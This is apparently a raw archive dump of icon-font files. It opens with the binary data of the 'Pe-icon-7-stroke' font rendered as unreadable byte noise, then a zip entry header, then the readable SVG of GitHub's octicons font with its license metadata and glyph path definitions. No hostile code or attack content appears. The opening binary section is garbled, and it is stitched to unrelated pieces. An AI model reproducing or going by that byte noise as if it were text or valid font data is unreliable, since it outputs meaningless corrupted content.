<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!]
��&it_sanctum/fonts/octicons/octicons.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
(c) 2012-2016 GitHub

When using the GitHub logos, be sure to follow the GitHub logo guidelines (https://github.com/logos)

Font License: SIL OFL 1.1 (http://scripts.sil.org/OFL)
Applies to all font files

Code License: MIT (http://choosealicense.com/licenses/mit/)
Applies to all other files
</metadata>
<defs>
<font id="octicons" horiz-adv-x="1024" >
<font-face font-family="octicons" font-weight="400" font-stretch="normal" units-per-em="1024" ascent="832" descent="-192" />
<missing-glyph d="M512 832C229.25 832 0 602.75 0 320c0-226.25 146.688-418.125 350.156-485.812 25.594-4.688 34.938 11.125 34.938 24.625 0 12.188-0.469 52.562-0.719 95.312C242-76.81200000000001 211.906 14.5 211.906 14.5c-23.312 59.125-56.844 74.875-56.844 74.875-46.531 31.75 3.53 31.125 3.53 31.125 51.406-3.562 78.47-52.75 78.47-52.75 45.688-78.25 119.875-55.625 149-42.5 4.654 33 17.904 55.625 32.5 68.375C304.906 106.56200000000001 185.344 150.5 185.344 346.688c0 55.938 19.969 101.562 52.656 137.406-5.219 13-22.844 65.094 5.062 135.562 0 0 42.938 13.75 140.812-52.5 40.812 11.406 84.594 17.031 128.125 17.219 43.5-0.188 87.312-5.875 128.188-17.281 97.688 66.312 140.688 52.5 140.688 52.5 28-70.531 10.375-122.562 5.125-135.5 32.812-35.844 52.625-81.469 52.625-137.406 0-196.688-119.75-240-233.812-252.688 18.438-15.875 34.75-47 34.75-94.75 0-68.438-0.688-123.625-0.688-140.5 0-13.625 9.312-29.562 35.25-24.562C877.438-98 1024 93.875 1024 320 1024 602.75 794.75 832 512 832z" horiz-adv-x="1024" />
<glyph glyph-name="alert" unicode="&#xf02d;" d="M1005.854 31.753000000000043l-438.286 767C556.173 818.694 534.967 831 512 831s-44.173-12.306-55.567-32.247l-438.286-767c-11.319-19.809-11.238-44.144 0.213-63.876C29.811-51.85500000000002 50.899-64 73.714-64h876.572c22.814 0 43.903 12.145 55.354 31.877S1017.173 11.94399999999996 1005.854 31.753000000000043zM576 64H448V192h128V64zM576 256H448V512h128V256z" horiz-adv-x="1024" />
<glyph glyph-name="arrow-down" unicode="&#xf03f;" d="M448 384V640H192v-256H0l320-384 320 384H448z" horiz-adv-x="640" />
<glyph glyph-name="arrow-left" unicode="&#xf040;" d="M384 448V640L0 320l384-320V192h256V448H384z" horiz-adv-x="640" />
<glyph glyph-name="arrow-right" unicode="&#xf03e;" d="M640 320L256 640v-192H0v-256h256v-192L640 320z" horiz-adv-x="640" />
<glyph glyph-name="arrow-small-down" unicode="&#xf0a0;" d="M256 384V512H128v-128H0l192-256 192 256H256z" horiz-adv-x="384" />
<glyph glyph-name="arrow-small-left" unicode="&#xf0a1;" d="M256 384V512L0 320l256-192V256h128V384H256z" horiz-adv-x="384" />
<glyph glyph-name="arrow-small-right" unicode="&#xf071;" d="M384 320L128 512v-128H0v-128h128v-128L384 320z" horiz-adv-x="384" />
<glyph glyph-name="arrow-small-up" unicode="&#xf09f;" d="M192 512L0 256h128v-128h128V256h128L192 512z" horiz-adv-x="384" />
<glyph glyph-name="arrow-up" unicode="&#xf03d;" d="M320 640L0 256h192v-256h256V256h192L320 640z" horiz-adv-x="640" />
<glyph glyph-name="beaker" unicode="&#xf0dd;" d="M920-102L704 384V640h64v64H192v-64h64v-256L40-102c-19-42 12-90 58-90h764c46 0 77 48 58 90zM240 192l80 192V640h320v-256l80-192H240z m272 128h64v-64h-64v64z m-64 64h-64v64h64v-64z m0 192h64v-64h-64v64z m0 192h-64V832h64v-64z" horiz-adv-x="1024" />
<glyph glyph-name="bell" unicode="&#xf0de;" d="M896 64v-64H0v64l47 37c49 49 52 163 76 283 49 241 261 320 261 320 0 35 29 64 64 64s64-29 64-64c0 0 217-79 266-320 24-120 27-234 76-283l42-37z m-448-256c71 0 128 57 128 128H320c0-71 57-128 128-128z" horiz-adv-x="896" />
<glyph glyph-name="bold" unicode="&#xf0e2;" d="M0 704h245c159 0 275-48 275-189 0-73-40-143-107-167v-4c85-19 147-79 147-183 0-153-126-225-295-225H0V704z m234-317c107 0 152 42 152 108 0 75-50 103-150 103H136v-211h98z m17-345c113 0 176 41 176 127 0 81-61 116-176 116H136v-243h115z" horiz-adv-x="640" />
<glyph glyph-name="book" unicode="&#xf007;" d="M128 512h256v-64H128v64z m0-192h256v64H128v-64z m0-128h256v64H128v-64z m704 320H576v-64h256v64z m0-128H576v-64h256v64z m0-128H576v-64h256v64z m128 384v-576c0-35-29-64-64-64H544l-64-64-64 64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h352l64-64 64 64h352c35 0 64-29 64-64z m-512-32l-32 32H64v-576h384V608z m448 32H544l-32-32v-544h384V640z" horiz-adv-x="1024" />
<glyph glyph-name="bookmark" unicode="&#xf07b;" d="M576 832H64C17 832 0 815 0 768v-960l320 198 320-198V768c0 47-17 64-64 64z m-50-272l-119-87 46-138c4-14-1-18-13-11l-120 86-120-86c-12-7-16-3-13 11l46 138-119 87c-11 10-9 15 6 15l147 2 45 138h16l45-138 147-2c15 0 17-5 6-15z" horiz-adv-x="640" />
<glyph glyph-name="briefcase" unicode="&#xf0d3;" d="M576 576v64c0 35-29 64-64 64H384c-35 0-64-29-64-64v-64H64c-35 0-64-29-64-64v-512c0-35 29-64 64-64h768c35 0 64 29 64 64V512c0 35-29 64-64 64H576z m-192 64h128v-64H384v64z m448-384H512v-64H384v64H64V512h64v-192h640V512h64v-256z" horiz-adv-x="896" />
<glyph glyph-name="broadcast" unicode="&#xf048;" d="M576 256h-64c35 0 64 29 64 64v64c0 35-29 64-64 64h-64c-35 0-64-29-64-64v-64c0-35 29-64 64-64h-64c-35 0-64-29-64-64v-128h64v-192c0-35 29-64 64-64h64c35 0 64 29 64 64V64h64V192c0 35-29 64-64 64zM448 384h64v-64h-64v64z m128-256h-64v-256h-64V128h-64v64h192v-64z m134 224c0 127-103 230-230 230S250 479 250 352c0-18 2-35 6-52v-127c-39 49-64 111-64 179 0 159 129 288 288 288s288-129 288-288c0-68-25-130-64-179V300c4 17 6 34 6 52z m250 0c0-184-104-344-256-424v67c119 74 198 206 198 357 0 233-189 422-422 422S58 585 58 352c0-151 79-283 198-357v-67C104 8 0 168 0 352 0 617 215 832 480 832s480-215 480-480z" horiz-adv-x="1024" />
<glyph glyph-name="browser" unicode="&#xf0c5;" d="M320 640h64v-64h-64V640zM192 640h64v-64h-64V640zM64 640h64v-64H64V640zM832 0H64V512h768V0zM832 576H448v64h384V576zM896 640c0 35.35-28.65 64-64 64H64c-35.35 0-64-28.65-64-64v-640c0-35.35 28.65-64 64-64h768c35.35 0 64 28.65 64 64V640z" horiz-adv-x="896" />
<glyph glyph-name="bug" unicode="&#xf091;" d="M704 192h192v64H704v64l203 66-22 60-181-62v64c0 35-29 64-64 64v64c0 31-23 56-53 62l66 66h115V768H627L499 640h-38L333 768H192v-64h115l66-66c-30-6-53-31-53-62v-64c-35 0-64-29-64-64v-64L75 446l-22-60 203-66v-64H64v-64h192v-64L53 62l22-60 181 62v-64c0-35 29-64 64-64h64l64 64V448h64v-448l64-64h64c35 0 64 29 64 64v64l181-62 22 60-203 66v64zM576 512H384v64h192v-64z" horiz-adv-x="1024" />
<glyph glyph-name="calendar" unicode="&#xf068;" d="M768 704h-64v-96c0-18-14-32-32-32H544c-18 0-32 14-32 32v96H320v-96c0-18-14-32-32-32H160c-18 0-32 14-32 32v96H64c-35 0-64-29-64-64v-704c0-35 29-64 64-64h704c35 0 64 29 64 64V640c0 35-29 64-64 64z m0-768H64V512h704v-576zM256 640h-64V768h64v-128z m384 0h-64V768h64v-128zM320 384h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64zM192 256h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64zM192 128h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64zM192 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z m128 0h-64v64h64v-64z" horiz-adv-x="896" />
<glyph glyph-name="check" unicode="&#xf03a;" d="M768 512L256 0 0 256l96 96 160-160 416 416 96-96z" horiz-adv-x="768" />
<glyph glyph-name="checklist" unicode="&#xf076;" d="M1024 288L640-96 448 96l96 96 96-96 288 288 96-96zM365 51l51-51H128c-35 0-64 29-64 64V640c0 35 29 64 64 64h448c35 0 64-29 64-64v-416l-51 51c-25 25-66 25-91 0L365 141c-25-25-25-65 0-90zM256 576h320v64H256v-64z m0-128h320v64H256v-64z m0-128h192v64H256v-64z m-64-64h-64v-64h64v64z m0 128h-64v-64h64v64z m0 128h-64v-64h64v64z m0 128h-64v-64h64v64z" horiz-adv-x="1024" />
<glyph glyph-name="chevron-down" unicode="&#xf0a3;" d="M320 128L0 448l96 96 224-240 224 240 96-96-320-320z" horiz-adv-x="640" />
<glyph glyph-name="chevron-left" unicode="&#xf0a4;" d="M352 640l96-96-240-224 240-224-96-96L32 320l320 320z" horiz-adv-x="512" />
<glyph glyph-name="chevron-right" unicode="&#xf078;" d="M480 320L160 0l-96 96 240 224L64 544l96 96 320-320z" horiz-adv-x="512" />
<glyph glyph-name="chevron-up" unicode="&#xf0a2;" d="M640 256l-96-96-224 240L96 160 0 256l320 320 320-320z" horiz-adv-x="640" />
<glyph glyph-name="circle-slash" unicode="&#xf084;" d="M448 768C201 768 0 567 0 320s201-448 448-448 448 201 448 448S695 768 448 768z m0-83c83 0 160-28 222-75L158 98c-47 62-75 139-75 222 0 201 164 365 365 365z m0-730c-83 0-160 28-222 75l512 512c47-62 75-139 75-222 0-201-164-365-365-365z" horiz-adv-x="896" />
<glyph glyph-name="circuit-board" unicode="&#xf0d6;" d="M192 512c0 35 29 64 64 64s64-29 64-64-29-64-64-64-64 29-64 64z m512 0c0 35-29 64-64 64s-64-29-64-64 29-64 64-64 64 29 64 64z m0-384c0 35-29 64-64 64s-64-29-64-64 29-64 64-64 64 29 64 64zM832 768H320v-139c23-12 41-30 53-53h150c27 50 85 82 150 67 48-12 87-51 98-99 20-88-46-166-131-166-51 0-95 28-117 70H373c-27-51-85-82-150-66-47 11-86 50-97 97-16 65 15 123 66 150V768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64l320 320h139c27 50 85 82 150 67 48-12 87-51 98-99 20-88-46-166-131-166-51 0-95 28-117 70h-75L256-128h576c35 0 64 29 64 64V704c0 35-29 64-64 64z" horiz-adv-x="896" />
<glyph glyph-name="clippy" unicode="&#xf035;" d="M128 64h256v-64H128v64z m320 384H128v-64h320v64z m128-192V384L384 192l192-192V128h320V256H576z m-288 64H128v-64h160v64zM128 128h160v64H128v-64z m576-64h64v-128c-1-18-7-33-19-45s-27-18-45-19H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h192C256 775 313 832 384 832s128-57 128-128h192c35 0 64-29 64-64v-320h-64V512H64v-576h640V64zM128 576h512c0 35-29 64-64 64h-64c-35 0-64 29-64 64s-29 64-64 64-64-29-64-64-29-64-64-64h-64c-35 0-64-29-64-64z" horiz-adv-x="896" />
<glyph glyph-name="clock" unicode="&#xf046;" d="M512 320h192v-128H448c-35 0-64 29-64 64V576h128v-256z m-64 365c201 0 365-164 365-365S649-45 448-45 83 119 83 320s164 365 365 365m0 83C201 768 0 567 0 320s201-448 448-448 448 201 448 448S695 768 448 768z" horiz-adv-x="896" />
<glyph glyph-name="cloud-download" unicode="&#xf00b;" d="M576 0h128l-192-192-192 192h128V320h128v-320z m192 512c0 28-58 192-288 192-155 0-288-123-288-256C65 448 0 351 0 256c0-98 64-192 192-192 28 0 170 0 192 0v83H192C88 147 83 238 83 256c0 11 3 109 109 109h83v83c0 89 100 173 205 173 163 0 200-99 205-115v-77h83c52 0 173-14 173-141 0-134-144-141-173-141H640v-83c24 0 127 0 128 0 133 0 256 74 256 224 0 156-123 224-256 224z" horiz-adv-x="1024" />
<glyph glyph-name="cloud-upload" unicode="&#xf00c;" d="M448 256H320l192 192 192-192H576v-320H448V256z m320 256c0 28-58 192-288 192-155 0-288-123-288-256C65 448 0 351 0 256c0-98 64-192 192-192 28 0 170 0 192 0v83H192C88 147 83 238 83 256c0 11 3 109 109 109h83v83c0 89 100 173 205 173 163 0 200-99 205-115v-77h83c52 0 173-14 173-141 0-134-144-141-173-141H640v-83c24 0 127 0 128 0 133 0 256 74 256 224 0 156-123 224-256 224z" horiz-adv-x="1024" />
<glyph glyph-name="code" unicode="&#xf05f;" d="M608 640l-96-96 224-224L512 96l96-96 288 320L608 640zM288 640L0 320l288-320 96 96L160 320l224 224L288 640z" horiz-adv-x="896" />
<glyph glyph-name="comment" unicode="&#xf02b;" d="M832 704H64c-35 0-64-29-64-64v-512c0-35 29-64 64-64h128v-224l224 224h416c35 0 64 29 64 64V640c0 35-29 64-64 64z m0-576H384L256 0V128H64V640h768v-512z" horiz-adv-x="896" />
<glyph glyph-name="comment-discussion" unicode="&#xf04f;" d="M960 704H384c-35 0-64-29-64-64v-128H64c-35 0-64-29-64-64v-384c0-35 29-64 64-64h64v-192l192 192h256c35 0 64 29 64 64V192h64l192-192V192h64c35 0 64 29 64 64V640c0 35-29 64-64 64zM576 64H288l-96-96v96H64V448h256v-192c0-35 29-64 64-64h192v-128z m384 192H832v-96l-96 96H384V640h576v-384z" horiz-adv-x="1024" />
<glyph glyph-name="credit-card" unicode="&#xf045;" d="M768 256H128v64h640v-64z m256 384v-576c0-35-29-64-64-64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h896c35 0 64-29 64-64z m-64-192H64v-384h896V448z m0 192H64v-64h896v64zM384 192H128v-64h256v64z" horiz-adv-x="1024" />
<glyph glyph-name="dash" unicode="&#xf0ca;" d="M0 384v-128h512V384H0z" horiz-adv-x="512" />
<glyph glyph-name="dashboard" unicode="&#xf07d;" d="M512 512h-64v64h64v-64z m256-192h-64v-64h64v64zM320 512h-64v-64h64v64z m-64-192h-64v-64h64v64z m704 352l-32 32-416-320c-4 1-64 0-64 0-35 0-64-29-64-64v-64c0-35 29-64 64-64h64c35 0 64 29 64 64v59l384 357zM858 410c12-39 19-80 19-122 0-219-178-397-397-397S83 69 83 288s178 397 397 397c77 0 148-22 209-60l60 60c-76 52-169 83-269 83C215 768 0 553 0 288s215-480 480-480 480 215 480 480c0 66-13 129-38 186l-64-64z" horiz-adv-x="1024" />
<glyph glyph-name="database" unicode="&#xf096;" d="M384-128C171.969-128 0-70.625 0 0c0 38.625 0 80.875 0 128 0 11.125 5.562 21.688 13.562 32C56.375 104.875 205.25 64 384 64s327.625 40.875 370.438 96c8-10.312 13.562-20.875 13.562-32 0-37.062 0-76.375 0-128C768-70.625 596-128 384-128zM384 128C171.969 128 0 185.375 0 256c0 38.656 0 80.844 0 128 0 6.781 2.562 13.375 6 19.906l0 0C7.938 408 10.5 412.031 13.562 416 56.375 360.906 205.25 320 384 320s327.625 40.906 370.438 96c3.062-3.969 5.625-8 7.562-12.094l0 0c3.438-6.531 6-13.125 6-19.906 0-37.062 0-76.344 0-128C768 185.375 596 128 384 128zM384 384C171.969 384 0 441.344 0 512c0 20.219 0 41.594 0 64 0 20.344 0 41.469 0 64C0 710.656 171.969 768 384 768c212 0 384-57.344 384-128 0-19.969 0-41.156 0-64 0-19.594 0-40.25 0-64C768 441.344 596 384 384 384zM384 704c-141.375 0-256-28.594-256-64s114.625-64 256-64 256 28.594 256 64S525.375 704 384 704z" horiz-adv-x="768" />
<glyph glyph-name="desktop-download" unicode="&#xf0dc;" d="M256 448h192V832h128v-384h192L512 192 256 448z m704 256H704v-64h256v-512H64V640h256v64H64c-35 0-64-29-64-64v-576c0-35 29-64 64-64h342c-16-39-55-89-150-128h512c-95 39-134 89-150 128h342c35 0 64 29 64 64V640c0 35-29 64-64 64z" horiz-adv-x="1024" />
<glyph glyph-name="device-camera" unicode="&#xf056;" d="M960 640H448c0 35-29 64-64 64H128c-35 0-64-29-64-64-35 0-64-29-64-64v-576c0-35 29-64 64-64h896c35 0 64 29 64 64V576c0 35-29 64-64 64zM384 512H128v64h256v-64z m288-448c-124 0-224 100-224 224s100 224 224 224 224-100 224-224-100-224-224-224z m160 224c0-88-72-160-160-160s-160 72-160 160 72 160 160 160 160-72 160-160z" horiz-adv-x="1024" />
<glyph glyph-name="device-camera-video" unicode="&#xf057;" d="M973 634L640 402V576c0 35-29 64-64 64H64c-35 0-64-29-64-64v-576c0-35 29-64 64-64h512c35 0 64 29 64 64V174l333-232c21-15 51 0 51 26V608c0 26-30 41-51 26z" horiz-adv-x="1024" />
<glyph glyph-name="device-desktop" unicode="&#xf27c;" d="M960 704H64c-35 0-64-29-64-64v-576c0-35 29-64 64-64h342c-16-39-55-89-150-128h512c-95 39-134 89-150 128h342c35 0 64 29 64 64V640c0 35-29 64-64 64z m0-576H64V640h896v-512z" horiz-adv-x="1024" />
<glyph glyph-name="device-mobile" unicode="&#xf038;" d="M576 832H64C29 832 0 803 0 768v-896c0-35 29-64 64-64h512c35 0 64 29 64 64V768c0 35-29 64-64 64zM320-147c-46 0-83 37-83 83s37 83 83 83 83-37 83-83-37-83-83-83z m256 211H64V704h512v-640z" horiz-adv-x="640" />
<glyph glyph-name="diff" unicode="&#xf04d;" d="M384 384h128v-64H384v-128h-64V320H192v64h128V512h64v-128zM192 0h320v64H192v-64z m288 704l224-224v-608c0-35-29-64-64-64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h416z m160-256L448 640H64v-768h576V448zM544 832S192 832 192 832v-64h320l256-256v-512h64V544L544 832z" horiz-adv-x="896" />
<glyph glyph-name="diff-added" unicode="&#xf06b;" d="M832 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h768c35 0 64 29 64 64V704c0 35-29 64-64 64z m0-832H64V704h768v-768zM384 256H192V384h192V576h128v-192h192v-128H512v-192H384V256z" horiz-adv-x="896" />
<glyph glyph-name="diff-ignored" unicode="&#xf099;" d="M832 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h768c35 0 64 29 64 64V704c0 35-29 64-64 64z m0-832H64V704h768v-768zM288 64h-96v96l416 416h96v-96L288 64z" horiz-adv-x="896" />
<glyph glyph-name="diff-modified" unicode="&#xf06d;" d="M832 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h768c35 0 64 29 64 64V704c0 35-29 64-64 64z m0-832H64V704h768v-768zM256 320c0 106 86 192 192 192s192-86 192-192-86-192-192-192-192 86-192 192z" horiz-adv-x="896" />
<glyph glyph-name="diff-removed" unicode="&#xf06c;" d="M832 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h768c35 0 64 29 64 64V704c0 35-29 64-64 64z m0-832H64V704h768v-768zM704 256H192V384h512v-128z" horiz-adv-x="896" />
<glyph glyph-name="diff-renamed" unicode="&#xf06e;" d="M384 256H192V384h192V576l320-256-320-256V256z m512 448v-768c0-35-29-64-64-64H64c-35 0-64 29-64 64V704c0 35 29 64 64 64h768c35 0 64-29 64-64z m-64 0H64v-768h768V704z" horiz-adv-x="896" />
<glyph glyph-name="ellipsis" unicode="&#xf09a;" d="M704 512H64c-35 0-64-29-64-64v-256c0-35 29-64 64-64h640c35 0 64 29 64 64V448c0 35-29 64-64 64zM256 256H128V384h128v-128z m192 0H320V384h128v-128z m192 0H512V384h128v-128z" horiz-adv-x="768" />
<glyph glyph-name="eye" unicode="&#xf04e;" d="M516 704C192 704 0 320 0 320s192-384 516-384c316 0 508 384 508 384S832 704 516 704z m-4-640c-141 0-256 114-256 256 0 141 115 256 256 256 142 0 256-115 256-256 0-142-114-256-256-256z m128 256c0-71-57-128-128-128s-128 57-128 128 57 128 128 128 128-57 128-128z" horiz-adv-x="1024" />
<glyph glyph-name="file-binary" unicode="&#xf094;" d="M256 64h64v-64H128v64h64V192h-64v64h128v-192z m512 480v-608c0-35-29-64-64-64H64c-35 0-64 29-64 64V704c0 35 29 64 64 64h480l224-224z m-64-32L512 704H64v-768h640V512z m-192 64H384v-64h64v-128h-64v-64h192v64h-64V576z m-384 0h192v-256H128V576z m64-192h64V512h-64v-128z m192-128h192v-256H384V256z m64-192h64V192h-64v-128z" horiz-adv-x="768" />
<glyph glyph-name="file-code" unicode="&#xf010;" d="M544 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h640c35 0 64 29 64 64V544L544 768z m160-832H64V704h448l192-192v-576zM320 385l-96-97 96-96-32-64-160 160 160 160 32-63z m160 63l160-160-160-160-32 63 96 97-96 96 32 64z" horiz-adv-x="768" />
<glyph glyph-name="file-directory" unicode="&#xf016;" d="M832 576H448v64c0 42-20 64-64 64H64c-35 0-64-29-64-64v-640c0-35 29-64 64-64h768c35 0 64 29 64 64V512c0 35-29 64-64 64z m-448 0H64v64h320v-64z" horiz-adv-x="896" />
<glyph glyph-name="file-media" unicode="&#xf012;" d="M384 512h128v-128H384V512z m384 32v-608c0-35-29-64-64-64H64c-35 0-64 29-64 64V704c0 35 29 64 64 64h480l224-224z m-64-32L512 704H64v-704l192 320 128-256 128 128 192-192V512z" horiz-adv-x="768" />
